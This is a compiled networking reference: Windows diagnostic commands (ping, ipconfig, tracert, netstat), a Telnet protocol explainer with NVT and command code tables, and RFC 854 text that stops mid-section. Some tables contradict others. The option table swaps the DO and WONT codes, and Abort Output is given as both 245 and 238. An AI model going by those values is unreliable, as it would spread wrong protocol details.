PING – The most basic and essential of the TCP/IP utilities, the PING command is used to test basic connectivity on a TCP/IP network. When you ping another host on your network, the machine from which the command is used sends out an “echo request” message, and then determines success by whether it receives back an “echo reply”. When echo reply messages are received, it means that the two computers are capable of communicating via TCP/IP. PING is the first utility that should always be used when attempting to troubleshoot a connectivity issue on a TCP/IP network. The ping command can be used with IP addresses or FQDNs.

For example, to ping the PC Answers web server, you would type ping www.pcanwers.co.uk, press Enter. If you receive 4 echo reply messages, you’re likely up and running correctly.

IPCONFIG – The IPCONFIG command represents the easiest way to gather TCP/IP configuration information for your computer from the command line. Instead of accessing your network properties through the Windows interface, simply type ipconfig at the command prompt and press Enter. You will be provided with information on the IP address, subnet mask, and default gateway values configured on your PC. For more comprehensive information (including the IP addresses of DNS servers), type ipconfig /all and press Enter. If you’re running Windows 2000 or XP, try using the ipconfig /displaydns command to view the FQDNs that your system has resolved to IP addresses.

TRACERT – One exceptionally interesting TCP/IP command used to troubleshoot network connectivity issues is TRACERT. The purpose of the TRACERT command is to trace the route that a packet takes between a source and destination host. For example, when you cannot ping a host, it does not necessarily mean that the host is unavailable. Instead, it might mean that a problem exists somewhere on the path between the two hosts. When the TRACERT command is issued with an IP address or FQDN, it will report back with information on the entire path taken (namely the routers crossed) in trying to reach the destination network. For example, try typing tracert www.yahoo.com and press Enter. This command will display all of the routers crossed between your PC and the Yahoo web server.

NETSTAT – The NETSTAT command is useful when attempting to determine the status of connections between your computer and other computers on your network or the Internet. From the command line, type netstat and press Enter. The results will show you both the systems that this computer is connected to, along with the status of the connections.
Traceroute.bmp: Use the TRACERT utility to determine the path that a packet takes between a course and destination host.

Windows XP Network Diagnostic Tools :

All Windows versions include a variety of network diagnostic tools, although you’ll find more in Windows XP than Windows 98. Regardless of your operating system version, the two basic tools that you’ll want to be familiar with include both the ipconfig and ping command line utilities.

The basic purpose of ipconfig is to allow you to view basic TCP/IP information about your system including its IP address, subnet mask, and default gateway. Conveniently, this tool will also let you know if your network cable is unplugged. Typing ipconfig at the prompt provides basic information, but typing ipconfig /all provides variety of additional data, including how your system acquired its address, for example statically or dynamically. If your system has what appears to be an address starting with 169.254, this likely means that a DHCP server wasn’t available – to try to acquire an address again, type ipconfig /renew and press Enter.

In the world of networking, ping is the most basic diagnostic utility to test communications. If you cannot connect to a system, try to ping its IP address using the format ping 192.168.0.1. You can also use the name of the server, for example ping www.pcanswers.co.uk. If you’re trying to fix your own system and want to ping continuously for testing purposes, use the –t option, for example ping –t 192.168.0.1. Finally, if you want to try to obtain the name of the computer for which you already know the IP address, type ping –a 192.168.0.1, and the name of the system will usually be returned.

TELNET Protocol :

SUMMARY

Telnet offers users the capability of running programs remotely and facilitates remote administration. Telnet is available for practically all operating systems and eases integration in heterogeneous networking environments.

MORE INFORMATION

Telnet is best understood in the context of a user with a simple terminal using the local Telnet program (known as the client program) to run a logon session on a remote computer where the user's communications needs are handled by a Telnet server program. Telnet server can pass on the data it has received from the client to many other types of processes including a remote logon server.

The Network Virtual Terminal :

Communication is established using TCP/IP and is based on a Network Virtual Terminal (NVT). On the client, the Telnet program is responsible for translating incoming NVT codes to codes understood by the client's display device as well as for translating client-generated keyboard codes into outgoing NVT codes.

The NVT uses 7-bit codes for characters. The display device, referred to as a printer in the RFC, is only required to display the standard printing ASCII characters represented by 7-bit codes and to recognize and process certain control codes. The 7-bit characters are transmitted as 8-bit bytes with the most significant bit set to zero. An end-of-line is transmitted as a carriage return (CR) followed by a line feed (LF). If you want to transmit an actual carriage return, this is transmitted as a carriage return followed by a NUL (all bits zero) character.

NVT ASCII is used by many other Internet protocols like SMTP and FTP.

The following control codes are required to be understood by the NVT.

Name	Code	Decimal Value	Function
NULL	NUL	0	No operation
Line Feed	LF	10	Moves the printer to the next print line, keeping the same horizontal position.
Carriage Return	CR	13	Moves the printer to the left margin of the current line.

The following further control codes are optional but should have the indicated defined effect on the display.

Name	Code	Decimal Value	Function
BELL	BEL	7	Produces an audible or visible signal (which does NOT move the print head.
Back Space	BS	8	Moves the print head one character position towards the left margin. (On a printing device, this mechanism was commonly used to form composite characters by printing two basic characters on top of each other.)
Horizontal Tab	HT	9	Moves the printer to the next horizontal tab stop. It remains unspecified how either party determines or establishes where such tab stops are located.
Vertical Tab	VT	11	Moves the printer to the next vertical tab stop. It remains unspecified how either party determines or establishes where such tab stops are located.
Form Feed	FF	12	Moves the printer to the top of the next page, keeping the same horizontal position. (On visual displays, this commonly clears the screen and moves the cursor to the top left corner.)

The NVT keyboard is specified as being capable of generating all 128 ASCII codes by using keys, key combinations, or key sequences.

Commands

The Telnet protocol uses various commands to control the client-server connection. These commands are transmitted within the data stream. The commands are distinguished from the data by setting the most significant bit to 1. (Remember that data is transmitted as 7-bits with the eighth bit set to 0) Commands are always introduced by the Interpret as command (IAC) character.

Here is the complete set of commands:

Name	Decimal Code	Meaning	Comment
SE	240	End of subnegotiation parameters
NOP	241	No operation
DM	242	Data mark	Indicates the position of a Synch event within the data stream. This should always be accompanied by a TCP urgent notification.
BRK	243	Break	Indicates that the "break" or "attention" key was hi.
IP	244	Suspend	Interrupt or abort the process to which the NVT is connected.
AO	245	Abort output	Allows the current process to run to completion but does not send its output to the user.
AYT	246	Are you there	Send back to the NVT some visible evidence that the AYT was received.
EC	247	Erase character	The receiver should delete the last preceding undeleted character from the data stream.
EL	248	Erase line	Delete characters from the data stream back to but not including the previous CRLF.
GA	249	Go ahead	Under certain circumstances used to tell the other end that it can transmit.
SB	250	Subnegotiation	Subnegotiation of the indicated option follows.
WILL	251	will	Indicates the desire to begin performing, or confirmation that you are now performing, the indicated option.
WONT	252	wont	Indicates the refusal to perform, or continue performing, the indicated option.
DO	253	do	Indicates the request that the other party perform, or confirmation that you are expecting the other party to perform, the indicated option.
DONT	254	dont	Indicates the demand that the other party stop performing, or confirmation that you are no longer expecting the other party to perform, the indicated option.
IAC	255	Interpret as command	Interpret as a command

Telnet Options

Options give the client and server a common view of the connection. They can be negotiated at any time during the connection by the use of commands. They are described in separate RFCs.

The following are examples of common options:

Decimal code	Name	RFC
3	suppress go ahead	858
5	status	859
1	echo	857
6	timing mark	860
24	terminal type	1091
31	window size	1073
32	terminal speed	1079
33	remote flow control	1372
34	linemode	1184
36	environment variables	1408

Either end of a Telnet conversation can locally or remotely enable or disable an option. The initiator sends a 3-byte command of the form:

IAC

Type of Operation

Option

The response is of the same form. Operation is one of:

Description	Decimal Code	Action
WILL	251	Sender wants to do something.
DO	252	Sender wants the other end to do something.
WONT	253	Sender does not want to do something.
DONT	254	Sender wants the other not to do something.

Associated with each of the these commands are various possible responses:

Sender Sent	Receiver Responds	Implication
WILL DO	The sender would like to use a certain facility if the receiver can handle it.	Option is now in effect.
WILL DONT	Receiver says it cannot support the option.	Option is not in effect.
DO WILL	The sender says it can handle traffic from the sender if the sender wishes to use a certain option.	Option is now in effect.
DO WONT	Receiver says it cannot support the option.	Option is not in effect.
WONT DONT	Option disabled.	DONT is only valid response.
DONT WONT	Option disabled.	WONT is only valid response.

For example, if the sender wants the other end to suppress go-ahead, it would send the byte sequence:

IAC

WILL

Suppress Go Ahead

The final byte of the 3-byte sequence identifies the required action.

Some option's values need to be communicated after support of the option has been agreed. This is done using sub-option negotiation. Values are negotiated using value query commands and responses in the following form:

IAC

option code

IAC

and

IAC

option code

IAC

For example, if the client wants to identify the terminal type to the server, the following exchange might take place:

CLIENT

IAC

WILL

Terminal Type

SERVER

IAC

Terminal Type

CLIENT

IAC

Terminal Type

IAC

SERVER

IAC

Terminal Type

IAC

The first exchange establishes that terminal type (option number 24) is handled, the server then enquires of the client what value it wishes to associate with the terminal type.

The sequence SB,24,1 implies sub-option negotiation for option type 24, value required (1). The IAC,SE sequence indicates the end of this request.

The response IAC,SB,24,0,'V'... implies sub-option negotiation for option type 24, value supplied (0), the IAC,SE sequence indicates the end of the response (and the supplied value).

The encoding of the value is specific to the option but a sequence of characters, as shown above, is common.

Descriptions of Telnet Options

Many of those listed are self-evident, but some call for more information.

Suppress Go Ahead

The original Telnet implementation defaulted to half duplex operation. This means that data traffic could only go in one direction at a time and specific action is required to indicate the end of traffic in one direction and that traffic may now start in the other direction. [This similar to the use of "roger" and "over" by amateur and CB radio operators.] The specific action is the inclusion of a GA character in the data stream.

Modern links normally allow bi-directional operation and the "suppress go ahead" option is enabled.

Echo

The echo option is enabled, usually by the server, to indicate that the server echos every character it receives. A combination of "suppress go ahead" and "echo" is called character-at-a-time mode meaning that each character is separately transmitted and echoed.

There is an understanding known as kludge-line mode, which means that if either "suppress go ahead" or "echo" is enabled but not both, then Telnet operates in line-at-a-time mode meaning that complete lines are assembled at each end and transmitted in one "go".

Linemode

This option replaces and supersedes the line mode kludge.

Remote Flow Control

This option controls where the special flow control effects of Ctrl+S or Ctrl+Q are implemented.

Telnet Control Functions

The Telnet protocol includes a number of control functions. These are initiated in response to conditions detected by the client (usually certain special keys or key combinations) or server. The detected condition causes a special character to be incorporated in the data stream.

Interrupt Process

This is used by the client to cause the suspension or termination of the server process. Typically, the user types Ctrl+C on the keyboard. An IP (244) character is included in the data stream.

Abort Output

This is used to suppress the transmission of remote process output. An AO (238) character is included in the data stream.

Are You There

This is used to trigger a visible response from the other end of the connection to confirm the operation of the link and the remote process. An AYT (246) character is incorporated in the data stream.

Erase character

This is sent to the display to tell it to delete the immediately preceding character from the display. An EC (247) character is incorporated in the data stream.

Erase line

This option causes the deletion of the current line of input. An EL (248) character is incorporated in the data stream.

Data Mark

Some control functions such as AO and IP require immediate action and this may cause difficulties if data is held in buffers awaiting input requests from a (possibly misbehaving) remote process. To work around this problem, a DM (242) character is sent in a TCP Urgent segment, this tells the receiver to examine the data stream for "interesting" characters such as IP, AO, and AYT. This is known as the Telnet synchronization mechanism.
A DM not in a TCP Urgent segment has no effect.

The Telnet Command

On Windows NT and most UNIX systems, a Telnet session can be initiated using the Telnet command. Most users simply type:

telnet remote_host

However, if the user just types telnet, then various options and subcommands are available.

The following is an example of a Telnet session from sfuclnt to sfusrvr.

C:\>telnet

Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to Microsoft Telnet Client
Telnet Client Build 5.00.99034.1
Escape Character is 'CTRL+]'
Microsoft Telnet> open sfusrvr

**** The screen will clear and the following information is displayed:

Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99034.1
login: sfu
password: ********

**** The screen will clear again and the following information is displayed:

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

APPLIES TO

•	Microsoft Windows 2000 Server
•	Microsoft Windows 2000 Advanced Server
•	Microsoft Windows 2000 Professional Edition
•	Microsoft Windows NT Services for UNIX Add-On Pack
•	Microsoft Windows NT Server 3.5
•	Microsoft Windows NT Server 3.51
•	Microsoft Windows NT Server 4.0 Standard Edition
•	Microsoft Windows NT Workstation 3.5
•	Microsoft Windows NT Workstation 3.51
•	Microsoft Windows NT Workstation 4.0 Developer Edition

Network Working Group                                          J. Postel

Request for Comments: 854                                    J. Reynolds

ISI

Obsoletes: NIC 18639                                            May 1983

                     TELNET PROTOCOL SPECIFICATION

This RFC specifies a standard for the ARPA Internet community.  Hosts on

the ARPA Internet are expected to adopt and implement this standard.

INTRODUCTION

   The purpose of the TELNET Protocol is to provide a fairly general,

   bi-directional, eight-bit byte oriented communications facility.  Its

   primary goal is to allow a standard method of interfacing terminal

   devices and terminal-oriented processes to each other.  It is

   envisioned that the protocol may also be used for terminal-terminal

   communication ("linking") and process-process communication

   (distributed computation).

GENERAL CONSIDERATIONS

   A TELNET connection is a Transmission Control Protocol (TCP)

   connection used to transmit data with interspersed TELNET control

   information.

   The TELNET Protocol is built upon three main ideas:  first, the

   concept of a "Network Virtual Terminal"; second, the principle of

   negotiated options; and third, a symmetric view of terminals and

   processes.

   1.  When a TELNET connection is first established, each end is

   assumed to originate and terminate at a "Network Virtual Terminal",

   or NVT.  An NVT is an imaginary device which provides a standard,

   network-wide, intermediate representation of a canonical terminal.

   This eliminates the need for "server" and "user" hosts to keep

   information about the characteristics of each other's terminals and

   terminal handling conventions.  All hosts, both user and server, map

   their local device characteristics and conventions so as to appear to

   be dealing with an NVT over the network, and each can assume a

   similar mapping by the other party.  The NVT is intended to strike a

   balance between being overly restricted (not providing hosts a rich

   enough vocabulary for mapping into their local character sets), and

   being overly inclusive (penalizing users with modest terminals).

      NOTE:  The "user" host is the host to which the physical terminal

      is normally attached, and the "server" host is the host which is

      normally providing some service.  As an alternate point of view,

RFC 854                                                         May 1983

      applicable even in terminal-to-terminal or process-to-process

      communications, the "user" host is the host which initiated the

      communication.

   2.  The principle of negotiated options takes cognizance of the fact

   that many hosts will wish to provide additional services over and

   above those available within an NVT, and many users will have

   sophisticated terminals and would like to have elegant, rather than

   minimal, services.  Independent of, but structured within the TELNET

   Protocol are various "options" that will be sanctioned and may be

   used with the "DO, DON'T, WILL, WON'T" structure (discussed below) to

   allow a user and server to agree to use a more elaborate (or perhaps

   just different) set of conventions for their TELNET connection.  Such

   options could include changing the character set, the echo mode, etc.

   The basic strategy for setting up the use of options is to have

   either party (or both) initiate a request that some option take

   effect.  The other party may then either accept or reject the

   request.  If the request is accepted the option immediately takes

   effect; if it is rejected the associated aspect of the connection

   remains as specified for an NVT.  Clearly, a party may always refuse

   a request to enable, and must never refuse a request to disable some

   option since all parties must be prepared to support the NVT.

   The syntax of option negotiation has been set up so that if both

   parties request an option simultaneously, each will see the other's

   request as the positive acknowledgment of its own.

   3.  The symmetry of the negotiation syntax can potentially lead to

   nonterminating acknowledgment loops -- each party seeing the incoming

   commands not as acknowledgments but as new requests which must be

   acknowledged.  To prevent such loops, the following rules prevail:

      a. Parties may only request a change in option status; i.e., a

      party may not send out a "request" merely to announce what mode it

      is in.

      b. If a party receives what appears to be a request to enter some

      mode it is already in, the request should not be acknowledged.

      This non-response is essential to prevent endless loops in the

      negotiation.  It is required that a response be sent to requests

      for a change of mode -- even if the mode is not changed.

      c. Whenever one party sends an option command to a second party,

      whether as a request or an acknowledgment, and use of the option

      will have any effect on the processing of the data being sent from

      the first party to the second, then the command must be inserted

      in the data stream at the point where it is desired that it take

RFC 854                                                         May 1983

      effect.  (It should be noted that some time will elapse between

      the transmission of a request and the receipt of an

      acknowledgment, which may be negative.  Thus, a host may wish to

      buffer data, after requesting an option, until it learns whether

      the request is accepted or rejected, in order to hide the

      "uncertainty period" from the user.)

   Option requests are likely to flurry back and forth when a TELNET

   connection is first established, as each party attempts to get the

   best possible service from the other party.  Beyond that, however,

   options can be used to dynamically modify the characteristics of the

   connection to suit changing local conditions.  For example, the NVT,

   as will be explained later, uses a transmission discipline well

   suited to the many "line at a time" applications such as BASIC, but

   poorly suited to the many "character at a time" applications such as

   NLS.  A server might elect to devote the extra processor overhead

   required for a "character at a time" discipline when it was suitable

   for the local process and would negotiate an appropriate option.

   However, rather than then being permanently burdened with the extra

   processing overhead, it could switch (i.e., negotiate) back to NVT

   when the detailed control was no longer necessary.

   It is possible for requests initiated by processes to stimulate a

   nonterminating request loop if the process responds to a rejection by

   merely re-requesting the option.  To prevent such loops from

   occurring, rejected requests should not be repeated until something

   changes.  Operationally, this can mean the process is running a

   different program, or the user has given another command, or whatever

   makes sense in the context of the given process and the given option.

   A good rule of thumb is that a re-request should only occur as a

   result of subsequent information from the other end of the connection

   or when demanded by local human intervention.

   Option designers should not feel constrained by the somewhat limited

   syntax available for option negotiation.  The intent of the simple

   syntax is to make it easy to have options -- since it is

   correspondingly easy to profess ignorance about them.  If some

   particular option requires a richer negotiation structure than

   possible within "DO, DON'T, WILL, WON'T", the proper tack is to use

   "DO, DON'T, WILL, WON'T" to establish that both parties understand

   the option, and once this is accomplished a more exotic syntax can be

   used freely.  For example, a party might send a request to alter

   (establish) line length.  If it is accepted, then a different syntax

   can be used for actually negotiating the line length -- such a

   "sub-negotiation" might include fields for minimum allowable, maximum

   allowable and desired line lengths.  The important concept is that

RFC 854                                                         May 1983

   such expanded negotiations should never begin until some prior

   (standard) negotiation has established that both parties are capable

   of parsing the expanded syntax.

   In summary, WILL XXX is sent, by either party, to indicate that

   party's desire (offer) to begin performing option XXX, DO XXX and

   DON'T XXX being its positive and negative acknowledgments; similarly,

   DO XXX is sent to indicate a desire (request) that the other party

   (i.e., the recipient of the DO) begin performing option XXX, WILL XXX

   and WON'T XXX being the positive and negative acknowledgments.  Since

   the NVT is what is left when no options are enabled, the DON'T and

   WON'T responses are guaranteed to leave the connection in a state

   which both ends can handle.  Thus, all hosts may implement their

   TELNET processes to be totally unaware of options that are not

   supported, simply returning a rejection to (i.e., refusing) any

   option request that cannot be understood.

   As much as possible, the TELNET protocol has been made server-user

   symmetrical so that it easily and naturally covers the user-user

   (linking) and server-server (cooperating processes) cases.  It is

   hoped, but not absolutely required, that options will further this

   intent.  In any case, it is explicitly acknowledged that symmetry is

   an operating principle rather than an ironclad rule.

   A companion document, "TELNET Option Specifications," should be

   consulted for information about the procedure for establishing new

   options.

THE NETWORK VIRTUAL TERMINAL

   The Network Virtual Terminal (NVT) is a bi-directional character

   device.  The NVT has a printer and a keyboard.  The printer responds

   to incoming data and the keyboard produces outgoing data which is

   sent over the TELNET connection and, if "echoes" are desired, to the

   NVT's printer as well.  "Echoes" will not be expected to traverse the

   network (although options exist to enable a "remote" echoing mode of

   operation, no host is required to implement this option).  The code

   set is seven-bit USASCII in an eight-bit field, except as modified

   herein.  Any code conversion and timing considerations are local

   problems and do not affect the NVT.

   TRANSMISSION OF DATA

      Although a TELNET connection through the network is intrinsically

      full duplex, the NVT is to be viewed as a half-duplex device

      operating in a line-buffered mode.  That is, unless and until

RFC 854                                                         May 1983

      options are negotiated to the contrary, the following default

      conditions pertain to the transmission of data over the TELNET

      connection:

         1)  Insofar as the availability of local buffer space permits,

         data should be accumulated in the host where it is generated

         until a complete line of data is ready for transmission, or

         until some locally-defined explicit signal to transmit occurs.

         This signal could be generated either by a process or by a

         human user.

         The motivation for this rule is the high cost, to some hosts,

         of processing network input interrupts, coupled with the

         default NVT specification that "echoes" do not traverse the

         network.  Thus, it is reasonable to buffer some amount of data

         at its source.  Many systems take some processing action at the

         end of each input line (even line printers or card punches

         frequently tend to work this way), so the transmission should

         be triggered at the end of a line.  On the other hand, a user

         or process may sometimes find it necessary or desirable to

         provide data which does not terminate at the end of a line;

         therefore implementers are cautioned to provide methods of

         locally signaling that all buffered data should be transmitted

         immediately.

         2)  When a process has completed sending data to an NVT printer

         and has no queued input from the NVT keyboard for further

         processing (i.e., when a process at one end of a TELNET

         connection cannot proceed without input from the other end),

         the process must transmit the TELNET Go Ahead (GA) command.

         This rule is not intended to require that the TELNET GA command

         be sent from a terminal at the end of each line, since server

         hosts do not normally require a special signal (in addition to

         end-of-line or other locally-defined characters) in order to

         commence processing.  Rather, the TELNET GA is designed to help

         a user's local host operate a physically half duplex terminal

         which has a "lockable" keyboard such as the IBM 2741.  A

         description of this type of terminal may help to explain the

         proper use of the GA command.

         The terminal-computer connection is always under control of

         either the user or the computer.  Neither can unilaterally

         seize control from the other; rather the controlling end must

         relinguish its control explicitly.  At the terminal end, the

         hardware is constructed so as to relinquish control each time

         that a "line" is terminated (i.e., when the "New Line" key is

         typed by the user).  When this occurs, the attached (local)

RFC 854                                                         May 1983

         computer processes the input data, decides if output should be

         generated, and if not returns control to the terminal.  If

         output should be generated, control is retained by the computer

         until all output has been transmitted.

         The difficulties of using this type of terminal through the

         network should be obvious.  The "local" computer is no longer

         able to decide whether to retain control after seeing an

         end-of-line signal or not; this decision can only be made by

         the "remote" computer which is processing the data.  Therefore,

         the TELNET GA command provides a mechanism whereby the "remote"

         (server) computer can signal the "local" (user) computer that

         it is time to pass control to the user of the terminal.  It

         should be transmitted at those times, and only at those times,

         when the user should be given control of the terminal.  Note

         that premature transmission of the GA command may result in the

         blocking of output, since the user is likely to assume that the

         transmitting system has paused, and therefore he will fail to

         turn the line around manually.

      The foregoing, of course, does not apply to the user-to-server

      direction of communication.  In this direction, GAs may be sent at

      any time, but need not ever be sent.  Also, if the TELNET

      connection is being used for process-to-process communication, GAs

      need not be sent in either direction.  Finally, for

      terminal-to-terminal communication, GAs may be required in

      neither, one, or both directions.  If a host plans to support

      terminal-to-terminal communication it is suggested that the host

      provide the user with a means of manually signaling that it is

      time for a GA to be sent over the TELNET connection; this,

      however, is not a requirement on the implementer of a TELNET

      process.

      Note that the symmetry of the TELNET model requires that there is

      an NVT at each end of the TELNET connection, at least

      conceptually.

   STANDARD REPRESENTATION OF CONTROL FUNCTIONS

      As stated in the Introduction to this document, the primary goal

      of the TELNET protocol is the provision of a standard interfacing

      of terminal devices and terminal-oriented processes through the

      network.  Early experiences with this type of interconnection have

      shown that certain functions are implemented by most servers, but

      that the methods of invoking these functions differ widely.  For a

      human user who interacts with several server systems, these

      differences are highly frustrating.  TELNET, therefore, defines a

      standard representation for five of these functions, as described

RFC 854                                                         May 1983

      below.  These standard representations have standard, but not

      required, meanings (with the exception that the Interrupt Process

      (IP) function may be required by other protocols which use

      TELNET); that is, a system which does not provide the function to

      local users need not provide it to network users and may treat the

      standard representation for the function as a No-operation.  On

      the other hand, a system which does provide the function to a

      local user is obliged to provide the same function to a network

      user who transmits the standard representation for the function.

      Interrupt Process (IP)

         Many systems provide a function which suspends, interrupts,

         aborts, or terminates the operation of a user process.  This

         function is frequently used when a user believes his process is

         in an unending loop, or when an unwanted process has been

         inadvertently activated.  IP is the standard representation for

         invoking this function.  It should be noted by implementers

         that IP may be required by other protocols which use TELNET,

         and therefore should be implemented if these other protocols

         are to be supported.

      Abort Output (AO)

         Many systems provide a function which allows a process, which

         is generating output, to run to completion (or to reach the

         same stopping point it would reach if running to completion)

         but without sending the output to the user's terminal.

         Further, this function typically clears any output already

         produced but not yet actually printed (or displayed) on the

         user's terminal.  AO is the standard representation for

         invoking this function.  For example, some subsystem might

         normally accept a user's command, send a long text string to

         the user's terminal in response, and finally signal readiness

         to accept the next command by sending a "prompt" character

         (preceded by ) to the user's terminal.  If the AO were

         received during the transmission of the text string, a

         reasonable implementation would be to suppress the remainder of

         the text string, but transmit the prompt character and the

         preceding .  (This is possibly in distinction to the

         action which might be taken if an IP were received; the IP

         might cause suppression of the text string and an exit from the

         subsystem.)

         It should be noted, by server systems which provide this

         function, that there may be buffers external to the system (in

RFC 854                                                         May 1983

         the network and the user's local host) which should be cleared;

         the appropriate way to do this is to transmit the "Synch"

         signal (described below) to the user system.

      Are You There (AYT)

         Many systems provide a function which provides the user with

         some visible (e.g., printable) evidence that the system is

         still up and running.  This function may be invoked by the user

         when the system is unexpectedly "silent" for a long time,

         because of the unanticipated (by the user) length of a

         computation, an unusually heavy system load, etc.  AYT is the

         standard representation for invoking this function.

      Erase Character (EC)

         Many systems provide a function which deletes the last

         preceding undeleted character or "print position"* from the

         stream of data being supplied by the user.  This function is

         typically used to edit keyboard input when typing mistakes are

         made.  EC is the standard representation for invoking this

         function.

            *NOTE:  A "print position" may contain several characters

            which are the result of overstrikes, or of sequences such as

             BS ...

      Erase Line (EL)

         Many systems provide a function which deletes all the data in

         the current "line" of input.  This function is typically used

         to edit keyboard input.  EL is the standard representation for

         invoking this function.

   THE TELNET "SYNCH" SIGNAL

      Most time-sharing systems provide mechanisms which allow a

      terminal user to regain control of a "runaway" process; the IP and

      AO functions described above are examples of these mechanisms.

      Such systems, when used locally, have access to all of the signals

      supplied by the user, whether these are normal characters or

      special "out of band" signals such as those supplied by the

      teletype "BREAK" key or the IBM 2741 "ATTN" key.  This is not

      necessarily true when terminals are connected to the system

      through the network; the network's flow control mechanisms may

      cause such a signal to be buffered elsewhere, for example in the

      user's host.

RFC 854                                                         May 1983

      To counter this problem, the TELNET "Synch" mechanism is

      introduced.  A Synch signal consists of a TCP Urgent notification,

      coupled with the TELNET command DATA MARK.  The Urgent

      notification, which is not subject to the flow control pertaining

      to the TELNET connection, is used to invoke special handling of

      the data stream by the process which receives it.  In this mode,

      the data stream is immediately scanned for "interesting" signals

      as defined below, discarding intervening data.  The TELNET command

      DATA MARK (DM) is the synchronizing mark in the data stream which

      indicates that any special signal has already occurred and the

      recipient can return to normal processing of the data stream.

         The Synch is sent via the TCP send operation with the Urgent

         flag set and the DM as the last (or only) data octet.

      When several Synchs are sent in rapid succession, the Urgent

      notifications may be merged.  It is not possible to count Urgents

      since the number received will be less than or equal the number

      sent.  When in normal mode, a DM is a no operation; when in urgent

      mode, it signals the end of the urgent processing.

         If TCP indicates the end of Urgent data before the DM is found,

         TELNET should continue the special handling of the data stream

         until the DM is found.

         If TCP indicates more Urgent data after the DM is found, it can

         only be because of a subsequent Synch.  TELNET should continue

         the special handling of the data stream until another DM is

         found.

      "Interesting" signals are defined to be:  the TELNET standard

      representations of IP, AO, and AYT (but not EC or EL); the local

      analogs of these standard representations (if any); all other

      TELNET commands; other site-defined signals which can be acted on

      without delaying the scan of the data stream.

      Since one effect of the SYNCH mechanism is the discarding of

      essentially all characters (except TELNET commands) between the

      sender of the Synch and its recipient, this mechanism is specified

      as the standard way to clear the data path when that is desired.

      For example, if a user at a terminal causes an AO to be

      transmitted, the server which receives the AO (if it provides that

      function at all) should return a Synch to the user.

      Finally, just as the TCP Urgent notification is needed at the

      TELNET level as an out-of-band signal, so other protocols which

      make use of TELNET may require a TELNET command which can be

      viewed as an out-of-band signal at a different level.

RFC 854                                                         May 1983

      By convention the sequence [IP, Synch] is to be used as such a

      signal.  For example, suppose that some other protocol, which uses

      TELNET, defines the character string STOP analogously to the

      TELNET command AO.  Imagine that a user of this protocol wishes a

      server to process the STOP string, but the connection is blocked

      because the server is processing other commands.  The user should

      instruct his system to:

         1. Send the TELNET IP character;

         2. Send the TELNET SYNC sequence, that is:

            Send the Data Mark (DM) as the only character

            in a TCP urgent mode send operation.

         3. Send the character string STOP; and

         4. Send the other protocol's analog of the TELNET DM, if any.

      The user (or process acting on his behalf) must transmit the

      TELNET SYNCH sequence of step 2 above to ensure that the TELNET IP

      gets through to the server's TELNET interpreter.

         The Urgent should wake up the TELNET process; the IP should

         wake up the next higher level process.

   THE NVT PRINTER AND KEYBOARD

      The NVT printer has an unspecified carriage width and page length

      and can produce representations of all 95 USASCII graphics (codes

      32 through 126).  Of the 33 USASCII control codes (0 through 31

      and 127), and the 128 uncovered codes (128 through 255), the

      following have specified meaning to the NVT printer:

         NAME                  CODE         MEANING

         NULL (NUL)              0      No Operation

         Line Feed (LF)         10      Moves the printer to the

                                        next print line, keeping the

                                        same horizontal position.

         Carriage Return (CR)   13      Moves the printer to the left

                                        margin of the current line.

RFC 854                                                         May 1983

         In addition, the following codes shall have defined, but not

         required, effects on the NVT printer.  Neither end of a TELNET

         connection may assume that the other party will take, or will

         have taken, any particular action upon receipt or transmission

         of these:

         BELL (BEL)              7      Produces an audible or

                                        visible signal (which does

                                        NOT move the print head).

         Back Space (BS)         8      Moves the print head one

                                        character position towards

                                        the left margin.

         Horizontal Tab (HT)     9      Moves the printer to the

                                        next horizontal tab stop.

                                        It remains unspecified how

                                        either party determines or

                                        establishes where such tab

                                        stops are located.

         Vertical Tab (VT)       11     Moves the printer to the

                                        next vertical tab stop.  It

                                        remains unspecified how

                                        either party determines or

                                        establishes where such tab

                                        stops are located.

         Form Feed (FF)          12     Moves the printer to the top

                                        of the next page, keeping

                                        the same horizontal position.

      All remaining codes do not cause the NVT printer to take any

      action.

      The sequence "CR LF", as defined, will cause the NVT to be

      positioned at the left margin of the next print line (as would,

      for example, the sequence "LF CR").  However, many systems and

      terminals do not treat CR and LF independently, and will have to

      go to some effort to simulate their effect.  (For example, some

      terminals do not have a CR independent of the LF, but on such

      terminals it may be possible to simulate a CR by backspacing.)

      Therefore, the sequence "CR LF" must be treated as a single "new

      line" character and used whenever their combined action is

      intended; the sequence "CR NUL" must be used where a carriage

      return alone is actually desired; and the CR character must be

      avoided in other contexts.  This rule gives assurance to systems

      which must decide whether to perform a "new line" function or a

      multiple-backspace that the TELNET stream contains a character

      following a CR that will allow a rational decision.

         Note that "CR LF" or "CR NUL" is required in both directions

RFC 854                                                         May 1983

         (in the default ASCII mode), to preserve the symmetry of the

         NVT model.  Even though it may be known in some situations

         (e.g., with remote echo and suppress go ahead options in

         effect) that characters are not being sent to an actual

         printer, nonetheless, for the sake of consistency, the protocol

         requires that a NUL be inserted following a CR not followed by

         a LF in the data stream.  The converse of this is that a NUL

         received in the data stream after a CR (in the absence of

         options negotiations which explicitly specify otherwise) should

         be stripped out prior to applying the NVT to local character

         set mapping.

      The NVT keyboard has keys, or key combinations, or key sequences,

      for generating all 128 USASCII codes.  Note that although many

      have no effect on the NVT printer, the NVT keyboard is capable of

      generating them.

      In addition to these codes, the NVT keyboard shall be capable of

      generating the following additional codes which, except as noted,

      have defined, but not reguired, meanings.  The actual code

      assignments for these "characters" are in the TELNET Command

      section, because they are viewed as being, in some sense, generic

      and should be available even when the data stream is interpreted

      as being some other character set.

      Synch

         This key allows the user to clear his data path to the other

         party.  The activation of this key causes a DM (see command

         section) to be sent in the data stream and a TCP Urgent

         notification is associated with it.  The pair DM-Urgent is to

         have required meaning as defined previously.

      Break (BRK)

         This code is provided because it is a signal outside the

         USASCII set which is currently given local meaning within many

         systems.  It is intended to indicate that the Break Key or the

         Attention Key was hit.  Note, however, that this is intended to

         provide a 129th code for systems which require it, not as a

         synonym for the IP standard representation.

      Interrupt Process (IP)

         Suspend, interrupt, abort or terminate the process to which the

         NVT is connected.  Also, part of the out-of-band signal for

         other protocols which use TELNET.

RFC 854                                                         May 1983

      Abort Output (AO)

         Allow the current process to (appear to) run to completion, but

         do not send its output to the user.  Also, send a Synch to the

         user.

      Are You There (AYT)

         Send back to the NVT some visible (i.e., printable) evidence

         that the AYT was received.

      Erase Character (EC)

